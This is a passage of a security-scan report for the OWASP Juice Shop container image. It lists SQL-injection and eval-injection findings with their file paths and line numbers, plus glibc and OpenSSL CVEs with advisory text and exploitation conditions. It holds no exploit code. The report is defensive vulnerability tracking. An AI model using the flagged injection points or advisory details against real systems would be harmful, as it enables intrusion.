+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
10
+ + + + + + + +
File Path
/src/data/static/codefixes/unionSqlInjectionChallenge_3.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 14: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
34
+ + + + + + + +
File Path
/src/routes/login.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 18: +javascript.sequelize.security.audit.sequelize-injection-express.express- +sequelize-injection + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 89 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
23
+ + + + + + + +
File Path
/src/routes/search.ts
+
+
+
+ + + + + +
Description
+

Result message: + Detected a sequelize statement that is tainted by user-input. This +could lead to SQL injection if the variable is user-controlled and is +not properly sanitized. In order to prevent SQL injection, it is +recommended to use parameterized queries or prepared statements.

+ + + + + + + + + + + + +
References
+

https://sequelize.org/docs/v6/core-concepts/raw-queries/#replacements

+ + + + + + + +
+
+
+
+ Finding 19: javascript.lang.security.audit.code-string-concat.code-string-concat + + + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + ActiveMay 12, 20260 daysAdmin User (admin) + + 95 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + +
Line Number
62
+ + + + + + + +
File Path
/src/routes/userProfile.ts
+
+
+
+ + + + + +
Description
+

Result message: Found data from an Express or Next web request flowing to eval. + If this data is user-controllable this can lead to execution of +arbitrary system commands in the context of your application process. +Avoid eval whenever possible.

+ + + + + + + + + + + + +
References
+

https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/eval
+https://nodejs.org/api/child_process.html#child_processexeccommand-options-callback
+https://www.stackhawk.com/blog/nodejs-command-injection-examples-and-prevention/
+https://ckarande.gitbooks.io/owasp-nodegoat-tutorial/content/tutorial/a1_-_server_side_js_injection.html

+ + + + + + + +
+
+
+
+ Finding 28: CVE-2025-4802 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 426 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H

+ + +
Description
+

glibc: static setuid binary dlopen may incorrectly search LD_LIBRARY_PATH
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 2.36-9+deb12u11

+

Untrusted LD_LIBRARY_PATH environment variable vulnerability in the +GNU C Library version 2.27 to 2.38 allows attacker controlled loading of + dynamically shared library in statically compiled setuid binaries that +call dlopen (including internal dlopen calls after setlocale or calls to + NSS functions such as getaddrinfo).

+ + +
Mitigation
+

2.36-9+deb12u11

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2025/05/16/7
+http://www.openwall.com/lists/oss-security/2025/05/17/2
+https://access.redhat.com/errata/RHSA-2025:8655
+https://access.redhat.com/security/cve/CVE-2025-4802
+https://bugzilla.redhat.com/2367468
+https://bugzilla.redhat.com/show_bug.cgi?id=2367468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-4802
+https://errata.almalinux.org/9/ALSA-2025-8655.html
+https://errata.rockylinux.org/RLSA-2025:8655
+https://inbox.sourceware.org/libc-announce/3ac997b0-28a5-4129-af53-675efe4c2dec@redhat.com/T/#u
+https://linux.oracle.com/cve/CVE-2025-4802.html
+https://linux.oracle.com/errata/ELSA-2025-8686.html
+https://lists.debian.org/debian-lts-announce/2025/05/msg00033.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-4802
+https://sourceware.org/bugzilla/show_bug.cgi?id=32976
+https://sourceware.org/cgit/glibc/commit/?id=1e18586c5820e329f741d5c710275e165581380e
+https://sourceware.org/cgit/glibc/commit/?id=5451fa962cd0a90a0e2ec1d8910a559ace02bba0
+https://ubuntu.com/security/notices/USN-7541-1
+https://www.cve.org/CVERecord?id=CVE-2025-4802
+https://www.openwall.com/lists/oss-security/2025/05/16/7
+https://www.openwall.com/lists/oss-security/2025/05/17/2

+ + + + + + + +
+
+
+
+ Finding 29: CVE-2026-0861 Libc6 2.36-9+deb12u10 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 190 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libc62.36-9+deb12u10
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

glibc: Integer overflow in memalign leads to heap corruption
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version:

+

Passing too large an alignment to the memalign suite of functions +(memalign, posix_memalign, aligned_alloc) in the GNU C Library version +2.30 to 2.42 may result in an integer overflow, which could consequently + result in a heap corruption.

+

Note that the attacker must have control over both, the size as well +as the alignment arguments of the memalign function to be able to +exploit this. The size parameter must be close enough to PTRDIFF_MAX so + as to overflow size_t along with the large alignment argument. This +limits the malicious inputs for the alignment for memalign to the range +[1<<62+ 1, 1<<63] and exactly 1<<63 for posix_memalign + and aligned_alloc.

+

Typically the alignment argument passed to such functions is a known +constrained quantity (e.g. page size, block size, struct sizes) and is +not attacker controlled, because of which this may not be easily +exploitable in practice. An application bug could potentially result in + the input alignment being too large, e.g. due to a different buffer +overflow or integer overflow in the application or its dependent +libraries, but that is again an uncommon usage pattern given typical +sources of alignments.

+ + + + + + +
Impact
+

affected

+ + + + + + + +
References
+

http://www.openwall.com/lists/oss-security/2026/01/16/5
+https://access.redhat.com/errata/RHSA-2026:2786
+https://access.redhat.com/security/cve/CVE-2026-0861
+https://bugzilla.redhat.com/2429771
+https://bugzilla.redhat.com/2430201
+https://bugzilla.redhat.com/2431196
+https://bugzilla.redhat.com/show_bug.cgi?id=2429771
+https://bugzilla.redhat.com/show_bug.cgi?id=2430201
+https://bugzilla.redhat.com/show_bug.cgi?id=2431196
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15281
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0861
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-0915
+https://errata.almalinux.org/9/ALSA-2026-2786.html
+https://errata.rockylinux.org/RLSA-2026:2786
+https://linux.oracle.com/cve/CVE-2026-0861.html
+https://linux.oracle.com/errata/ELSA-2026-50120.html
+https://nvd.nist.gov/vuln/detail/CVE-2026-0861
+https://sourceware.org/bugzilla/show_bug.cgi?id=33796
+https://sourceware.org/git/?p=glibc.git;a=blob_plain;f=advisories/GLIBC-SA-2026-0001
+https://ubuntu.com/security/notices/USN-8005-1
+https://www.cve.org/CVERecord?id=CVE-2026-0861

+ + + + + + + +
+
+
+
+ Finding 51: CVE-2025-69419 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 787 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N

+ + +
Description
+

openssl: OpenSSL: Arbitrary code execution due to out-of-bounds write in PKCS#12 processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: Calling PKCS12_get_friendlyname() function on a maliciously
+crafted PKCS#12 file with a BMPString (UTF-16BE) friendly name containing
+non-ASCII BMP code point can trigger a one byte write before the allocated
+buffer.

+

Impact summary: The out-of-bounds write can cause a memory corruption
+which can have various consequences including a Denial of Service.

+

The OPENSSL_uni2utf8() function performs a two-pass conversion of a PKCS#12
+BMPString (UTF-16BE) to UTF-8. In the second pass, when emitting UTF-8 bytes,
+the helper function bmp_to_utf8() incorrectly forwards the remaining UTF-16
+source byte count as the destination buffer capacity to UTF8_putc(). For BMP
+code points above U+07FF, UTF-8 requires three bytes, but the forwarded
+capacity can be just two bytes. UTF8_putc() then returns -1, and this negative
+value is added to the output length without validation, causing the
+length to become negative. The subsequent trailing NUL byte is then written
+at a negative offset, causing write outside of heap allocated buffer.

+

The vulnerability is reachable via the public PKCS12_get_friendlyname() API
+when parsing attacker-controlled PKCS#12 files. While PKCS12_parse() uses a
+different code path that avoids this issue, PKCS12_get_friendlyname() directly
+invokes the vulnerable function. Exploitation requires an attacker to provide
+a malicious PKCS#12 file to be parsed by the application and the attacker
+can just trigger a one zero byte write before the allocated buffer.
+For that reason the issue was assessed as Low severity according to our
+Security Policy.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0 and 1.1.1 are vulnerable to this issue.

+

OpenSSL 1.0.2 is not affected by this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:4472
+https://access.redhat.com/security/cve/CVE-2025-69419
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-4472.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-x77r-97gw-wh89
+https://github.com/openssl/openssl/commit/41be0f216404f14457bbf3b9cc488dba60b49296
+https://github.com/openssl/openssl/commit/7e9cac9832e4705b91987c2474ed06a37a93cecb
+https://github.com/openssl/openssl/commit/a26a90d38edec3748566129d824e664b54bee2e2
+https://github.com/openssl/openssl/commit/cda12de3bc0e333ea8d2c6fd15001dbdaf280015
+https://github.com/openssl/openssl/commit/ff628933755075446bca8307e8417c14d164b535
+https://linux.oracle.com/cve/CVE-2025-69419.html
+https://linux.oracle.com/errata/ELSA-2026-50131.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-69419
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2025-69419

+ + + + + + + +
+
+
+
+ Finding 52: CVE-2025-69421 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 476 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service via malformed PKCS#12 file processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.18-1~deb12u2

+

Issue summary: Processing a malformed PKCS#12 file can trigger a NULL pointer
+dereference in the PKCS12_item_decrypt_d2i_ex() function.

+

Impact summary: A NULL pointer dereference can trigger a crash which leads to
+Denial of Service for an application processing PKCS#12 files.

+

The PKCS12_item_decrypt_d2i_ex() function does not check whether the oct
+parameter is NULL before dereferencing it. When called from
+PKCS12_unpack_p7encdata() with a malformed PKCS#12 file, this parameter can
+be NULL, causing a crash. The vulnerability is limited to Denial of Service
+and cannot be escalated to achieve code execution or memory disclosure.

+

Exploiting this issue requires an attacker to provide a malformed PKCS#12 file
+to an application that processes it. For that reason the issue was assessed as
+Low severity according to our Security Policy.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the PKCS#12 implementation is outside the OpenSSL FIPS module boundary.

+

OpenSSL 3.6, 3.5, 3.4, 3.3, 3.0, 1.1.1 and 1.0.2 are vulnerable to this issue.

+ + +
Mitigation
+

3.0.18-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/errata/RHSA-2026:1473
+https://access.redhat.com/security/cve/CVE-2025-69421
+https://bugzilla.redhat.com/2430375
+https://bugzilla.redhat.com/2430376
+https://bugzilla.redhat.com/2430377
+https://bugzilla.redhat.com/2430378
+https://bugzilla.redhat.com/2430379
+https://bugzilla.redhat.com/2430380
+https://bugzilla.redhat.com/2430381
+https://bugzilla.redhat.com/2430386
+https://bugzilla.redhat.com/2430387
+https://bugzilla.redhat.com/2430388
+https://bugzilla.redhat.com/2430389
+https://bugzilla.redhat.com/2430390
+https://bugzilla.redhat.com/show_bug.cgi?id=2430375
+https://bugzilla.redhat.com/show_bug.cgi?id=2430376
+https://bugzilla.redhat.com/show_bug.cgi?id=2430377
+https://bugzilla.redhat.com/show_bug.cgi?id=2430378
+https://bugzilla.redhat.com/show_bug.cgi?id=2430379
+https://bugzilla.redhat.com/show_bug.cgi?id=2430380
+https://bugzilla.redhat.com/show_bug.cgi?id=2430381
+https://bugzilla.redhat.com/show_bug.cgi?id=2430386
+https://bugzilla.redhat.com/show_bug.cgi?id=2430387
+https://bugzilla.redhat.com/show_bug.cgi?id=2430388
+https://bugzilla.redhat.com/show_bug.cgi?id=2430389
+https://bugzilla.redhat.com/show_bug.cgi?id=2430390
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-11187
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15467
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15468
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-15469
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-66199
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-68160
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69418
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69419
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69420
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-69421
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22795
+https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2026-22796
+https://errata.almalinux.org/9/ALSA-2026-1473.html
+https://errata.rockylinux.org/RLSA-2026:1473
+https://github.com/advisories/GHSA-w9rv-xc8m-cmqp
+https://github.com/openssl/openssl/commit/3524a29271f8191b8fd8a5257eb05173982a097b
+https://github.com/openssl/openssl/commit/36ecb4960872a4ce04bf6f1e1f4e78d75ec0c0c7
+https://github.com/openssl/openssl/commit/4bbc8d41a72c842ce4077a8a3eccd1109aaf74bd
+https://github.com/openssl/openssl/commit/643986985cd1c21221f941129d76fe0c2785aeb3
+https://github.com/openssl/openssl/commit/a2dbc539f0f9cc63832709fa5aa33ad9495eb19c
+https://linux.oracle.com/cve/CVE-2025-69421.html
+https://linux.oracle.com/errata/ELSA-2026-50081.html
+https://nvd.nist.gov/vuln/detail/CVE-2025-69421
+https://openssl-library.org/news/secadv/20260127.txt
+https://ubuntu.com/security/notices/USN-7980-1
+https://ubuntu.com/security/notices/USN-7980-2
+https://www.cve.org/CVERecord?id=CVE-2025-69421

+ + + + + + + +
+
+
+
+ Finding 53: CVE-2026-28387 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 416 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

+ + +
Description
+

openssl: OpenSSL: Arbitrary code execution due to use-after-free in DANE TLSA authentication
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: An uncommon configuration of clients performing DANE TLSA-based
+server authentication, when paired with uncommon server DANE TLSA records, may
+result in a use-after-free and/or double-free on the client side.

+

Impact summary: A use after free can have a range of potential consequences
+such as the corruption of valid data, crashes or execution of arbitrary code.

+

However, the issue only affects clients that make use of TLSA records with both
+the PKIX-TA(0/PKIX-EE(1) certificate usages and the DANE-TA(2) certificate
+usage.

+

By far the most common deployment of DANE is in SMTP MTAs for which RFC7672
+recommends that clients treat as 'unusable' any TLSA records that have the PKIX
+certificate usages. These SMTP (or other similar) clients are not vulnerable
+to this issue. Conversely, any clients that support only the PKIX usages, and
+ignore the DANE-TA(2) usage are also not vulnerable.

+

The client would also need to be communicating with a server that publishes a
+TLSA RRset with both types of TLSA records.

+

No FIPS modules are affected by this issue, the problem code is outside the
+FIPS module boundary.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-28387
+https://github.com/openssl/openssl/commit/07e727d304746edb49a98ee8f6ab00256e1f012b
+https://github.com/openssl/openssl/commit/258a8f63b26995ba357f4326da00e19e29c6acbe
+https://github.com/openssl/openssl/commit/444958deaf450aea819171f97ae69eaedede42c3
+https://github.com/openssl/openssl/commit/7a4e08cee62a728d32e60b0de89e6764339df0a7
+https://github.com/openssl/openssl/commit/ec03fa050b3346997ed9c5fef3d0e16ad7db8177
+https://nvd.nist.gov/vuln/detail/CVE-2026-28387
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://ubuntu.com/security/notices/USN-8155-2
+https://www.cve.org/CVERecord?id=CVE-2026-28387
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 54: CVE-2026-28388 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 476 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service due to NULL pointer dereference in delta CRL processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: When a delta CRL that contains a Delta CRL Indicator extension
+is processed a NULL pointer dereference might happen if the required CRL
+Number extension is missing.

+

Impact summary: A NULL pointer dereference can trigger a crash which
+leads to a Denial of Service for an application.

+

When CRL processing and delta CRL processing is enabled during X.509
+certificate verification, the delta CRL processing does not check
+whether the CRL Number extension is NULL before dereferencing it.
+When a malformed delta CRL file is being processed, this parameter
+can be NULL, causing a NULL pointer dereference.

+

Exploiting this issue requires the X509_V_FLAG_USE_DELTAS flag to be enabled in
+the verification context, the certificate being verified to contain a
+freshestCRL extension or the base CRL to have the EXFLAG_FRESHEST flag set, and
+an attacker to provide a malformed CRL to an application that processes it.

+

The vulnerability is limited to Denial of Service and cannot be escalated to
+achieve code execution or memory disclosure. For that reason the issue was
+assessed as Low severity according to our Security Policy.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this issue,
+as the affected code is outside the OpenSSL FIPS module boundary.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-28388
+https://github.com/openssl/openssl/commit/59c3b3158553ab53275bbbccca5cb305d591cf2e
+https://github.com/openssl/openssl/commit/5a0b4930779cd2408880979db765db919da55139
+https://github.com/openssl/openssl/commit/602542f2c0c2d5edb47128f93eac10b62aeeefb3
+https://github.com/openssl/openssl/commit/a9d187dd1000130100fa7ab915f8513532cb3bb8
+https://github.com/openssl/openssl/commit/d3a901e8d9f021f3e67d6cfbc12e768129862726
+https://nvd.nist.gov/vuln/detail/CVE-2026-28388
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://ubuntu.com/security/notices/USN-8155-2
+https://www.cve.org/CVERecord?id=CVE-2026-28388
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 55: CVE-2026-28389 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 476 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service vulnerability in CMS processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: During processing of a crafted CMS EnvelopedData message
+with KeyAgreeRecipientInfo a NULL pointer dereference can happen.

+

Impact summary: Applications that process attacker-controlled CMS data may
+crash before authentication or cryptographic operations occur resulting in
+Denial of Service.

+

When a CMS EnvelopedData message that uses KeyAgreeRecipientInfo is
+processed, the optional parameters field of KeyEncryptionAlgorithmIdentifier
+is examined without checking for its presence. This results in a NULL
+pointer dereference if the field is missing.

+

Applications and services that call CMS_decrypt() on untrusted input
+(e.g., S/MIME processing or CMS-based protocols) are vulnerable.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
+issue, as the affected code is outside the OpenSSL FIPS module boundary.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

https://access.redhat.com/security/cve/CVE-2026-28389
+https://github.com/advisories/GHSA-7x88-9hgc-69gf
+https://github.com/openssl/openssl/commit/16cea4188e0ea567deb4f93f85902247e67384f5
+https://github.com/openssl/openssl/commit/785cbf7ea3b5a6f5adf0c1ccb92b79d89c35c616
+https://github.com/openssl/openssl/commit/7b5274e812400cacb6f3be4c2df5340923fa807f
+https://github.com/openssl/openssl/commit/c6725634e089eb2b634b10ede33944be7248172a
+https://github.com/openssl/openssl/commit/f80f83bc5fd036bc47d773e8b15a001e2b4ce686
+https://nvd.nist.gov/vuln/detail/CVE-2026-28389
+https://openssl-library.org/news/secadv/20260407.txt
+https://ubuntu.com/security/notices/USN-8155-1
+https://ubuntu.com/security/notices/USN-8155-2
+https://www.cve.org/CVERecord?id=CVE-2026-28389
+https://www.openwall.com/lists/oss-security/2026/04/07/11

+ + + + + + + +
+
+
+
+ Finding 56: CVE-2026-28390 Libssl3 3.0.17-1~deb12u2 + + + + debian + + os-pkgs + + + +
+
+
+
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
SeverityEPSS Score / PercentileStatusDate discoveredAgeReporterCWE
+ + + High + + + + N.A. + / + N.A. + Active, VerifiedMay 12, 20260 daysAdmin User (admin) + + 476 + +
+
+
+ + + + + + + + + +
+
+
+
+
Location
+
+ + + + + + + + + + + + + + + + + + + + + +
ComponentVersion
libssl33.0.17-1~deb12u2
+ + + + + + + +
File Path
bkimminich/juice-shop:v19.0.0 (debian 12.11)
+
+
+
+ + + + +
CVSS v3
+

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

+ + +
Description
+

openssl: OpenSSL: Denial of Service due to NULL pointer dereference in CMS EnvelopedData processing
+Target: bkimminich/juice-shop:v19.0.0 (debian 12.11)
+Type: debian
+Fixed version: 3.0.19-1~deb12u2

+

Issue summary: During processing of a crafted CMS EnvelopedData message
+with KeyTransportRecipientInfo a NULL pointer dereference can happen.

+

Impact summary: Applications that process attacker-controlled CMS data may
+crash before authentication or cryptographic operations occur resulting in
+Denial of Service.

+

When a CMS EnvelopedData message that uses KeyTransportRecipientInfo with
+RSA-OAEP encryption is processed, the optional parameters field of
+RSA-OAEP SourceFunc algorithm identifier is examined without checking
+for its presence. This results in a NULL pointer dereference if the field
+is missing.

+

Applications and services that call CMS_decrypt() on untrusted input
+(e.g., S/MIME processing or CMS-based protocols) are vulnerable.

+

The FIPS modules in 3.6, 3.5, 3.4, 3.3 and 3.0 are not affected by this
+issue, as the affected code is outside the OpenSSL FIPS module boundary.

+ + +
Mitigation
+

3.0.19-1~deb12u2

+ + + + + +
Impact
+

fixed

+ + + + + + + +
References
+

